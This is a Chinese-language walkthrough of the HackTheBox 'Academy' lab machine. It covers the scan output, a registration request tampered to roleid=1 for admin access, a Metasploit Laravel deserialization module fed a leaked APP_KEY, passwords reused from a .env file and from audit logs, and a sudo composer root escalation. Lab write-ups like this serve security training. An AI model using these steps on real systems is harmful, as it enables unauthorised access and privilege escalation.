Recon

根据Nmap结果，全端口扫描结果相同，共开放两个端口。故从80入手。

# Nmap 7.91 scan initiated Thu Nov 12 18:50:33 2020 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.215
Nmap scan report for 10.10.10.215
Host is up (0.53s latency).
Not shown: 989 closed ports
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp   open     http           Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
512/tcp  filtered exec
901/tcp  filtered samba-swat
1002/tcp filtered windows-icfw
1092/tcp filtered obrpd
3914/tcp filtered listcrt-port-2
6666/tcp filtered irc
7007/tcp filtered afs3-bos
7741/tcp filtered scriptview
8222/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 12 18:57:26 2020 -- 1 IP address (1 host up) scanned in 413.15 second

FootHold

使用IP访问后，强制跳转到academy.htb，在hosts文件中指定IP地址后访问该域名，得到HTB Academy的页面。
查看网页源码，发现其使用php语言编写，开始使用gobuster进行目录爆破。结果如下:

~/Documents/HTB/Academy 6s
❯ cat gobuster/academy.htb-root
/images (Status: 301)
/admin.php (Status: 200)
/register.php (Status: 200)
/login.php (Status: 200)
/config.php (Status: 200)
/home.php (Status: 302)
/index.php (Status: 200)
/server-status (Status: 403)

由于开放了注册功能，在register.php的源码中发现POST时隐藏的字段roleid。根据字面意思，该字段大概意思为角色ID。

1	<input type="hidden" value="0" name="roleid" />

果然，用burpsuite截断注册请求，其中果然有roleid。将其改为1，便可访问/admin.php

我他妈就是个智障，一开始没开burpsuite，在登陆后的静态页面点了一大半天。

POST /register.php HTTP/1.1
Host: academy.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: http://academy.htb
DNT: 1
Connection: close
Referer: http://academy.htb/register.php
Cookie: PHPSESSID=j1lt4n4j5n7oq1vkseajg8m7rk
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

uid=htb&password=htb&confirm=htb&roleid=1

访问后发现建设中成的域名dev-staging-01.academy.htb将其添加到hosts文件中。以及两个用于最初设置的用户Complete initial set of modules (cry0l1t3 / mrb3n)

User.txt

在这个Url内的左侧，大大的写着:

1 2	Environment Variables APP_NAME "Laravel"

根据习惯，searchsploit一波梭。

msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options 

Module options (exploit/unix/http/laravel_token_unserialize_exec):

   Name       Current Setting                               Required  Description
   ----       ---------------                               --------  -----------
   APP_KEY    dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=  no        The base64 encoded APP_KEY string from the .env file
   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.215                                  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                                            yes       The target port (TCP)
   SSL        false                                         no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                                             yes       Path to target webapp
   VHOST      dev-staging-01.academy.htb                    no        HTTP server virtual host

这里要注意的事 RHOSTS 和 VHOST 根据字面意思一定要写对。这样我们就能拿到www-data的shell了。

UserShell

上传linpeas.sh并行后，[这里是我太差劲了，有数据库没想着仔细枚举，过度依赖脚本。下次还得多注意。]在/var/www/html/academy目录下存在.env用于配置数据库的密码mySup3rP4s5w0rd!!，但我用该密码尝试登录数据库时失败。

www-data@academy:/var/www/html/academy$ ls -la
total 280
drwxr-xr-x 12 www-data www-data   4096 Aug 13 12:42 .
drwxr-xr-x  4 root     root       4096 Aug 13 12:36 ..
-rw-r--r--  1 www-data www-data    706 Aug 13 12:42 .env
-rw-r--r--  1 www-data www-data    651 Feb  7  2018 .env.example
-rw-r--r--  1 www-data www-data    111 Feb  7  2018 .gitattributes
-rw-r--r--  1 www-data www-data    155 Feb  7  2018 .gitignore
drwxr-xr-x  6 www-data www-data   4096 Feb  7  2018 app
-rwxr-xr-x  1 www-data www-data   1686 Feb  7  2018 artisan
drwxr-xr-x  3 www-data www-data   4096 Feb  7  2018 bootstrap
-rw-r--r--  1 www-data www-data   1512 Feb  7  2018 composer.json
-rw-r--r--  1 www-data www-data 191621 Aug  9 11:57 composer.lock
...
www-data@academy:/var/www/html/academy$ cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost

LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
...

结合之前发现的最初设置用户，使用该密码登录cry0l1t3成功，拿到user.txt。

www-data@academy:/var/www/html/academy$ su - cry0l1t3
Password: 
$ bash
cry0l1t3@academy:~$ ls -la
total 44
drwxr-xr-x 7 cry0l1t3 cry0l1t3 4096 Nov 12 12:20 .
drwxr-xr-x 8 root     root     4096 Aug 10 00:34 ..
lrwxrwxrwx 1 root     root        9 Aug 10 23:41 .bash_history -> /dev/null
-rw-r--r-- 1 cry0l1t3 cry0l1t3  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 cry0l1t3 cry0l1t3 3771 Feb 25  2020 .bashrc
drwx------ 2 cry0l1t3 cry0l1t3 4096 Aug 12 21:58 .cache
drwx------ 4 cry0l1t3 cry0l1t3 4096 Nov 12 12:22 .gnupg
drwxrwxr-x 3 cry0l1t3 cry0l1t3 4096 Aug 12 02:30 .local
-rw-r--r-- 1 cry0l1t3 cry0l1t3  807 Feb 25  2020 .profile
drwxr-xr-x 3 cry0l1t3 cry0l1t3 4096 Nov 12 12:19 snap
drwxrwxr-x 2 cry0l1t3 cry0l1t3 4096 Nov 12 12:15 .ssh
-r--r----- 1 cry0l1t3 cry0l1t3   33 Nov 12 07:32 user.txt
cry0l1t3@academy:~$ wc -c user.txt 
33 user.txt

Privilege Escalation

在第一次运行linpeas的时候就发现当前用户cry0l1t3拥有adm权限，故猜测又需要阅读/var/log/下的日志。这件事情我还是交给了linpeas来完成。

果然，脚本又帮我们在/var/log/下找到了mrb3n的密码。

[+] Checking for TTY (sudo/su) passwords in logs
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>

切换到该用户后，该用户可以以sudo身份运行composer，结合GTFOBin，一波梭完成提权。

mrb3n@academy:/tmp$ rm -rf tmp.Q9tCu8rJFu/
mrb3n@academy:/tmp$ TF=$(mktemp -d)
mrb3n@academy:/tmp$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
mrb3n@academy:/tmp$ sudo /usr/bin/composer --working-dir=$TF run-script x
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# bash
root@academy:~# wc -c root.txt 
33 root.txt